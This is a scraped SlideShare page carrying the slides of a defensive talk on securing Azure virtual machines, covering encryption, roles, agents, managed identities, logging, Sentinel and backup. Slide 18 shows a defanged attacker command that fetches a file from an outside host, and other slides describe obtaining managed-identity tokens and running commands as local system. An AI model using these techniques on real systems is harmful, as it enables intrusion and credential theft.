Massive Lift & Shift Migrations to Microsoft Azure with the Microsoft Migrati...
 
Enabling Cognitive Workloads on the Cloud: GPUs with Mesos, Docker and Marath...
Enabling Cognitive Workloads on the Cloud: GPUs with Mesos, Docker and Marath...Enabling Cognitive Workloads on the Cloud: GPUs with Mesos, Docker and Marath...
Enabling Cognitive Workloads on the Cloud: GPUs with Mesos, Docker and Marath...
 
Azure Site Recovery Bootcamp
Azure Site Recovery BootcampAzure Site Recovery Bootcamp
Azure Site Recovery Bootcamp
 
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptxConfidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptx
 
2020-02-10 Java on Azure Solution Briefing
2020-02-10 Java on Azure Solution Briefing2020-02-10 Java on Azure Solution Briefing
2020-02-10 Java on Azure Solution Briefing
 
Deep Dive OpenShitt on Azure & .NET Core on OpenShift
Deep Dive OpenShitt on Azure & .NET Core on OpenShiftDeep Dive OpenShitt on Azure & .NET Core on OpenShift
Deep Dive OpenShitt on Azure & .NET Core on OpenShift
 
Az 104 session 3 azure compute
Az 104 session 3 azure compute Az 104 session 3 azure compute
Az 104 session 3 azure compute
 
Microsoft Windows Server 2022 Overview
Microsoft Windows Server 2022 OverviewMicrosoft Windows Server 2022 Overview
Microsoft Windows Server 2022 Overview
 
SCCM on Microsoft Azure
SCCM on Microsoft AzureSCCM on Microsoft Azure
SCCM on Microsoft Azure
 
Windows Azure IaaS and Hybrid
Windows Azure IaaS and HybridWindows Azure IaaS and Hybrid
Windows Azure IaaS and Hybrid
 
Llunitebe2018 best of_two_worlds-manage.your.servers.the.azure.or.configmgr.way
Llunitebe2018 best of_two_worlds-manage.your.servers.the.azure.or.configmgr.wayLlunitebe2018 best of_two_worlds-manage.your.servers.the.azure.or.configmgr.way
Llunitebe2018 best of_two_worlds-manage.your.servers.the.azure.or.configmgr.way
 
Identity Server on Azure: A Reference Architecture
Identity Server on Azure: A Reference ArchitectureIdentity Server on Azure: A Reference Architecture
Identity Server on Azure: A Reference Architecture
 
Az 104 session 8 azure monitoring
Az 104 session 8 azure monitoringAz 104 session 8 azure monitoring
Az 104 session 8 azure monitoring
 
Azure en Nutanix: your journey to the hybrid cloud
Azure en Nutanix: your journey to the hybrid cloudAzure en Nutanix: your journey to the hybrid cloud
Azure en Nutanix: your journey to the hybrid cloud
 

More from Marius Sandbu

Hackcon - Ransomware
Hackcon - RansomwareHackcon - Ransomware
Hackcon - RansomwareMarius Sandbu
 
EUC State of the Union 2021
EUC State of the Union 2021EUC State of the Union 2021
EUC State of the Union 2021Marius Sandbu
 
Ransomware - Hvordan beskytte seg mot slike angrep?
Ransomware - Hvordan beskytte seg mot slike angrep? Ransomware - Hvordan beskytte seg mot slike angrep?
Ransomware - Hvordan beskytte seg mot slike angrep? Marius Sandbu
 
Ransomware erfaringer 2021
Ransomware erfaringer 2021Ransomware erfaringer 2021
Ransomware erfaringer 2021Marius Sandbu
 
Migrate to WVD and Beyond
Migrate to WVD and BeyondMigrate to WVD and Beyond
Migrate to WVD and BeyondMarius Sandbu
 
State of the EUC - 2020 What's new in End-User Computing
State of the EUC - 2020 What's new in End-User ComputingState of the EUC - 2020 What's new in End-User Computing
State of the EUC - 2020 What's new in End-User ComputingMarius Sandbu
 
State of the EUC - 2020 What's new in End-User Computing
State of the EUC - 2020 What's new in End-User ComputingState of the EUC - 2020 What's new in End-User Computing
State of the EUC - 2020 What's new in End-User ComputingMarius Sandbu
 
Windows Virtual Desktop
Windows Virtual DesktopWindows Virtual Desktop
Windows Virtual DesktopMarius Sandbu
 
Citrix Cloud XL - Running Ctirix in Public Cloud
Citrix Cloud XL - Running Ctirix in Public CloudCitrix Cloud XL - Running Ctirix in Public Cloud
Citrix Cloud XL - Running Ctirix in Public CloudMarius Sandbu
 
Citrix with Microsoft EMS
Citrix with Microsoft EMSCitrix with Microsoft EMS
Citrix with Microsoft EMSMarius Sandbu
 
Delivering and optimizing citrix from microsoft azure
Delivering and optimizing citrix from microsoft azure Delivering and optimizing citrix from microsoft azure
Delivering and optimizing citrix from microsoft azure Marius Sandbu
 
Application layering vs Application Isolation
Application layering vs Application IsolationApplication layering vs Application Isolation
Application layering vs Application IsolationMarius Sandbu
 
Netscaler and system center
Netscaler and system centerNetscaler and system center
Netscaler and system centerMarius Sandbu
 

More from Marius Sandbu (14)

Hackcon - Ransomware
Hackcon - RansomwareHackcon - Ransomware
Hackcon - Ransomware
 
EUC State of the Union 2021
EUC State of the Union 2021EUC State of the Union 2021
EUC State of the Union 2021
 
Ransomware - Hvordan beskytte seg mot slike angrep?
Ransomware - Hvordan beskytte seg mot slike angrep? Ransomware - Hvordan beskytte seg mot slike angrep?
Ransomware - Hvordan beskytte seg mot slike angrep?
 
Ransomware erfaringer 2021
Ransomware erfaringer 2021Ransomware erfaringer 2021
Ransomware erfaringer 2021
 
Migrate to WVD and Beyond
Migrate to WVD and BeyondMigrate to WVD and Beyond
Migrate to WVD and Beyond
 
State of the EUC - 2020 What's new in End-User Computing
State of the EUC - 2020 What's new in End-User ComputingState of the EUC - 2020 What's new in End-User Computing
State of the EUC - 2020 What's new in End-User Computing
 
State of the EUC - 2020 What's new in End-User Computing
State of the EUC - 2020 What's new in End-User ComputingState of the EUC - 2020 What's new in End-User Computing
State of the EUC - 2020 What's new in End-User Computing
 
Windows Virtual Desktop
Windows Virtual DesktopWindows Virtual Desktop
Windows Virtual Desktop
 
Azure sentinel
Azure sentinelAzure sentinel
Azure sentinel
 
Citrix Cloud XL - Running Ctirix in Public Cloud
Citrix Cloud XL - Running Ctirix in Public CloudCitrix Cloud XL - Running Ctirix in Public Cloud
Citrix Cloud XL - Running Ctirix in Public Cloud
 
Citrix with Microsoft EMS
Citrix with Microsoft EMSCitrix with Microsoft EMS
Citrix with Microsoft EMS
 
Delivering and optimizing citrix from microsoft azure
Delivering and optimizing citrix from microsoft azure Delivering and optimizing citrix from microsoft azure
Delivering and optimizing citrix from microsoft azure
 
Application layering vs Application Isolation
Application layering vs Application IsolationApplication layering vs Application Isolation
Application layering vs Application Isolation
 
Netscaler and system center
Netscaler and system centerNetscaler and system center
Netscaler and system center
 

Recently uploaded

Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsAndrey Dotsenko
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 

Recently uploaded (20)

Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 

Securing Virtual Machines in Microsoft Azure

  • 1. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway github.com/msugn Securing Virtual Machine Workloads in Azure
  • 2. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Who am I? @msandbu Linkedin.com/msandbu Marius Sandbu Cloud Evangelist @ Sopra Steria msandbu.org
  • 3. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Agenda
  • 4. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Over 18 000 criticital vulnerabilities reported in 2021 80 % of all ransomware aimed at end-users $LAPSUS «hacked» Samsung, NVIDIA, Microsoft og Okta Ransomware attack «attempts» every 11 seconds Crititical Vulnerabilities slike PrintNightmare, new RPC CVE and browsers (w/Extensions) On average 30 – 60 days to patch in an organization DDoS attack measures at 3,47 TBps against Azure 2021/2022 – The years we got new sad records...
  • 5. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Storage Disk VM01 Read/Write SSE (Storage Service Encryption) Platform Managed Keys • All data encrypted physically on storage nodes with Bitlocker • Keys Managed by Microsoft • (Platform Managed Keys – PMK) • Customer-Managed (CMK) keys using Azure KeyVault • Can also deploy KeyVault with dedicated HSM solution • Ensures securing disks physically in the datacenter Physical Server Generation 1 Storage Disk SSE (Storage Service Encryption) Customer Managed Keys Disk Encryption Or...
  • 6. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Storage Disk VM01 Read/Write SSE (Storage Service Encryption) Platform Managed Keys • Azure Disk Encryption for encryption of VHD files and OS • Adds 3 – 5% CPU usage • Confidential Computing for encryption of working memory of the VM • AMD SEV-SNP or Intel SGX • Intel SGX requires rewriting of applications to use new CPU instructions • AMD SEV-SNP does not require modifications AMD SEV-SNP Confidential Computing Minne Kryptert miljø Disk and OS Encryption ADE
  • 7. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Gen 1 vs Gen 2 - VM Feature Generation 1 VM Generation 2 VM Boot type PCAT UEFI Disk Controllers IDE SCSI VM Typer Almost everyone Almost everyone OS Disk > 2 TB No Yes Price difference? No No Support VHDX? No No VBS NO Yes Trusted Launch No Yes vTPM NO Yes • Use Gen 2 wherever possible! • Cannot migrate from Gen 1 to Gen 2 • Solution? Create new VM with existing source disk • Not all VM types support Gen 2 yet • Some GPU instances • VBS = Support for: • Credential Guard • Trusted Boot (does not work with Site Recovery or Shared/Ultra Disks) • Application Guard • VM Attestation service
  • 8. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Azure infrastruktur Physical Server Storage Disk Physical Server VM01 Azure infrastruktur Availability Zone #1 – Region X Azure Resource Manager (RDFE) Azure Fabric Controller (Service Fabric) Microsoft.Storage RP Microsoft.Compute RP Fabric Agent Fabric Agent { "Name": "Virtual Machine Operator", "Id": "88888888-8888-8888-8888- 888888888888", "IsCustom": true, "Description": "Actions": [ "Microsoft.Storage/*/read", "Microsoft.Network/*/read", "Microsoft.Compute/*/read", "NotActions": [], "DataActions": [], "NotDataActions": [], "AssignableScopes": [ "/subscriptions/{subscriptionId1}", "/subscriptions/{subscriptionId2}",] }
  • 9. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Azure Access • Access is managed against Azure Resource Providers • Operations include Read/write/action/delete/* • Access can be defined on different levels • Management Group • Subscription • Resource Group • Ressurs • Remember Global Admin  User Access Administrator • PIM, Access Packages or CloudKnox for elevation of access "roleName": "Virtual Machine Contributor", "actions": [ "Microsoft.Authorization/*/read", "Microsoft.Compute/availabilitySets/*", "Microsoft.Compute/locations/*", "Microsoft.Compute/virtualMachines/*", "Microsoft.Compute/disks/write", "Microsoft.Compute/disks/delete", "Microsoft.DevTestLab/schedules/*", "Microsoft.Insights/alertRules/*", "Microsoft.Network/applicationGateways/backendAddressPools/join/action", "Microsoft.Network/loadBalancers/backendAddressPools/join/action", "Microsoft.Network/loadBalancers/inboundNatPools/join/action", "Microsoft.Network/loadBalancers/inboundNatRules/join/action", "Microsoft.Network/loadBalancers/probes/join/action", "Microsoft.Network/loadBalancers/read", "Microsoft.Network/locations/*", "Microsoft.Network/networkInterfaces/*", "Microsoft.Network/networkSecurityGroups/join/action", "Microsoft.Network/networkSecurityGroups/read", "Microsoft.Network/publicIPAddresses/join/action", "Microsoft.Network/publicIPAddresses/read", "Microsoft.Network/virtualNetworks/read", "Microsoft.Network/virtualNetworks/subnets/join/action", "Microsoft.RecoveryServices/locations/*", "Microsoft.RecoveryServices/Vaults/backupFabrics/backupProtectionIntent/write", "Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/protectedItems/*/read", "Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/protectedItems/read", "Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/protectedItems/write", "Microsoft.RecoveryServices/Vaults/backupPolicies/read", "Microsoft.RecoveryServices/Vaults/backupPolicies/write", "Microsoft.RecoveryServices/Vaults/write", "Microsoft.ResourceHealth/availabilityStatuses/read", "Microsoft.Resources/deployments/*", "Microsoft.Resources/subscriptions/resourceGroups/read", "Microsoft.SerialConsole/serialPorts/connect/action", "Microsoft.SqlVirtualMachine/*", "Microsoft.Storage/storageAccounts/listKeys/action", "Microsoft.Storage/storageAccounts/read", "Microsoft.Support/*"
  • 10. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Access • Permissions should only be temporary • Can also make custom Azure Roles using JSON based template • Access over a longer period should be handled using Access Review • Does user still require access after two months? • Group based access please Access Packages: - SharePoint Sites - Azure AD Applications - Azure AD Grupper og Teams Privileged Identity Management - Azure AD Roller - Azure Resource Manager Roller (Custom Roles) - Kan defineres på ulike scope (Ressurs gruppe, Sub, MG) CloudKnox (Kommer snart..ja veldig snart) - Azure Resource Manager (Provider Tilganger) - Basert på historisk tilganger - Andre skyleverandører
  • 11. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Azure Agents for virtual machines • To guest agents by default • Provisioning Agent • Windows Guest Agent • PA Agent needs to be installed to properly start VM. • Doomsday – 13 Oktober 2021 • Windows Guest Agent used for many different features • DNS lookup • Extension installation • Snapshot backup • Runs as local system on machine • Extensions collected from Azure Blob Storage via 168.63.129.16 168.63.129.16:80 168.63.129.16:32526 Windows Machine in Azure Windows Azure Guest Agent HTTP GET / machine?comp=goalstate Compute Resource Provider (Service Fabric Cluster) Status (Ready) AppAgentRuntime 169.254.169.254 Azure Instance Metadata Service HTTP GET /metadata/ instance?api-version HTTP POST /healthservice DNS Manifest files WireServer az vm extension set --resource-group myResourceGroup --vm-name myVM --name DependencyAgentLinux --publisher Microsoft.Azure.Monitoring.DependencyAgent --version 9.5 --enable- auto-upgrade true
  • 12. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Extensions and Run Commands • Runs also as context of local system account • No way to remove the features • Only permission needed is • Microsoft.Compute/virtualMachines/runCommand/action • Accessible by Virtual Machine Contributer • Requires Public IP access to Azure from VM • Managed Run Commands in Preview • Parallel execution of multiple scripts • Support for long running scripts Example: Set-ADAccountPassword -Identity user03 - NewPassword $NewPwd -Reset Log path: C:WindowsAzureLogsPluginsMicrosoft.CPlat.Core.RunCom mandWindows
  • 13. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Managed Identities • Provides VMs with their own Azure AD Identity • Lives and dies with the VM • Commonly used for authentication to other Azure Services • Kubernetes • SQL • What kind of permissions does the managed identities actually have? • GET: 'http://169.254.169.254/metadata/ide ntity/oauth2/token?api-version=2018- 02- 01&resource=https://management.azu re.com/' HTTP/1.1 Metadata: true Example: Azure Resource Graph: // SAMI = System-assigned Managed Identity // UAMI = User-assigned Managed Identity // Sjekker om VM eller VMSS har SAMI eller UAMI resources | join kind=leftouter( resourcecontainers | where type=='microsoft.resources/subscriptions' | project subscriptionName=name, subscriptionId ) on subscriptionId | where type =~ "microsoft.compute/virtualmachines" or type =~ "microsoft.compute/virtualMachineScaleSets" | extend identityType = identity.type | extend hasManagedIdentity = iff(identity == "", "No", "Yes"), isSystemAssignedEnable = iff(identityType contains "SystemAssigned", "Yes", "No") | project subscriptionId, subscriptionName, name, resourceGroup, identityType, hasManagedIdentity, isSystemAssignedEnable Remember to turn on Azure AD Diagnostics logging
  • 14. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Managed Identities and Azure AD Join • Azure AD Join supported for Linux and Windows (Server 2019 and later) • Virtual Machine Administrator or User logon access required to logon machine • Dsregcmd /status and /leave good commands to remember • Remember to exclude “Azure Windows VM Sign-in” from Conditional Access • Supported by Azure Bastion via RDP/SSH with UPN: AzureADjohn@contoso.com
  • 15. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Logs and log sources Audit log Category Enabled as standard Retention User Activity Microsoft 365 Security No 90 Days (1 year for E5) Admin Activity Microsoft 365 Security No 90 Days (1 year for E5) Mailbox Audit Exchange Online Yes 90 Days Sign-In Activity Azure AD Yes 30 Days (AAD P1) Users at Risk Azure AD Yes 7 Days (30 Days, P1/P2) Risky Sign-ins Azure AD Yes 7 Days (30 Days, P1/P2) Azure MFA Usage Azure AD Yes 30 Days Directory Audit Azure AD Yes 7 Days (30 Days, P1/P2) Intune Activity Log Intune Yes 1 Year (Graph API)
  • 16. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Logs and log sources Audit Log Category Enabled as standard Retention Azure Resource Manager Azure Yes 30 Days Network Security Group Flow Logs Azure No Depending on Configuration Azure Diagnostic Logs Azure No Depending on Configuration Azure Application Insight Azure No Depending on Configuration VM Event Logs OS Yes Size defined in Group Policy Custom Logs OS N/A Application specific logs Azure Security Center Azure No (Cost per host/PaaS) Depending on Log Analytics SaaS Usage N/A No Requires Cloud App Discovery Custom Sources** N/A No Depending on Configuration
  • 17. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Logging and Monitorering in Azure Data Collection Rule Data Collection Rule Security Events Microsoft Monitoring Agenten Log Analytics Workspace Log Analytics Workspace w/Sentinel Application Events Depedency Agent • Microsoft Monitoring Agent (MMA) vs Log Analytics Agent (Legacy) • MMA with Data Collection Rules • Dependency Agent provides insight into processes and network connections • Custom Log files in Preview https://bit.ly/3vclP4d • Sysmon with extra config to collect even more audit data SwiftOnSecurity/sysmon-config
  • 18. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway How to see the full picture? VM Connection (VM Insight) DeviceFileEvents (Defender for Cloud) Configuration Change (Azure Automation) Security Events (Microsoft Sentinel via Log Analytics) Windows VM i Azure DeviceProcess Events (Defender for Cloud) 8.8.8.8 Inbound 3389 svchost Russia 8.8.8.8 4624 - An account was successfully logged on. powershell wget hxxp://209.14.0[.]234:466 13/VcEtrKighyIFS5foGNXH –file *.zip Service Stopped MpSense powershell.exe -ExecutionPolicy Unrestricted -Neininteractive
  • 19. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Log Analytics and Sentinel Data Flow Solutions Network Performance Monitor Azure Monitor for containers Service Map Alert Playbooks Azure Security Graph Threat Intelligence Machine Learning Dashboards Visualization Hunting Queries Jupyter Notebooks Sentinel ITSM Connector Update Management Data Collector Pipeline time Indexing time Surge Protection New Data Source Log Analytics Workspace Retention: 90 days Data Collector API Temporary Storage Solution Collection Interval Azure Diagnostics 2 – min Network Performance Monitor 3 min Windows Update Analytics (24 hours) Metric Collector API SQL Server (7 days) Agent Collection API Endpoint Purge API Analytics Rules • Log Analytics – Extra Solutions: • DNS Insight • Antimalware assessment • Basic and Analytics Logs (In preview) • Sentinel with connectors to collect security events • Either Sentinel or Defender for Servers • Microsoft Defender support is in Preview • (for data collection)
  • 20. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Example Query let IP = (externaldata(ip:string) [@"https://rules.emergingthreats.net/blockrules/compromised-ips.txt", @"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/5.txt", @"https://cinsscore.com/list/ci-badguys.txt", @"https://infosec.cert-pa.it/analyze/listip.txt", @"https://feodotracker.abuse.ch/downloads/ipblocklist_recommended.txt" ] with(format="csv") | where ip matches regex "(^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0- | distinct ip ); (union isfuzzy=true (SecurityEvent | where IpAddress in (IP) | extend Ip = IpAddress, User = Account ), (VMConnection | where SourceIp in (IP) | extend Ip = SourceIp | where LinksLive == 1 ), (SigninLogs | where IPAddress in (IP) | extend Ip = IPAddress, User = UserPrincipalName )) External Sources Regex Magic Map it against table SecurityEvent Map it against table VMConnection Map it against table SignInLogs
  • 21. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Azure Backup • Azure Backup for virtual machines Also adding support for multiple backup points yeah day (Enhanced Policy) • Now support for Archive Tier for backup (monthly and yearly) • Resource Guard – Ensure that backup admin cannot delete backup data • Are also some third party alternatives • Example: Veeam Azure for VM • Example: Velero/Kasten for AKS Kontakt for tilgang til preview  askazurebackupteam@microsoft.com
  • 22. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Update Management Azure Automation Log Analytics Workspace Microsoft Update Log Analytics Agenten Hybrid Runbook Worker • Does not support Optional Updates (Example: SQL Service Packs) • New version coming here soon! • Does not support Windows Clients OS (Requires Intune or others) • Updates collected from the source defined on machine. • HotPatching - Server 2022 – Azure Edition • SMB over QUIC (SMB over UDP) • Extended Networking
  • 23. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway AutoManage • Predefined profiles for management • Production or Dev/test • Backup not activiated for dev/test • Guest Configuration Baseline • Azure Policy • Not support in Norway East yet...
  • 24. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Defender for Cloud and Servers • Microsoft and third-party vulnerability management • Microsoft or Qualys • Software Inventory • IPFIX monitoring or known «bad» traffic • Requries a service with public IP or LB • Lisens for Defender for Endpoint (EDR) P1 eller P2 • Adaptive Application Control = AppLocker • Antimalware = free for Azure VM’s • Innstalled trough Azure Extension • Custom Solution with Dashboards via Log Analytics
  • 25. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Azure Policy – Guest Configuration • Group Policy for Azure! • Based upon DSC for Windows / Linux • Will be replacing DSC in Automation • GuestConfiguration Extension needs to be installed (Can also be done by its own Policy • Provides machine with its own managed identity • (If provisioned via the Azure Portal)
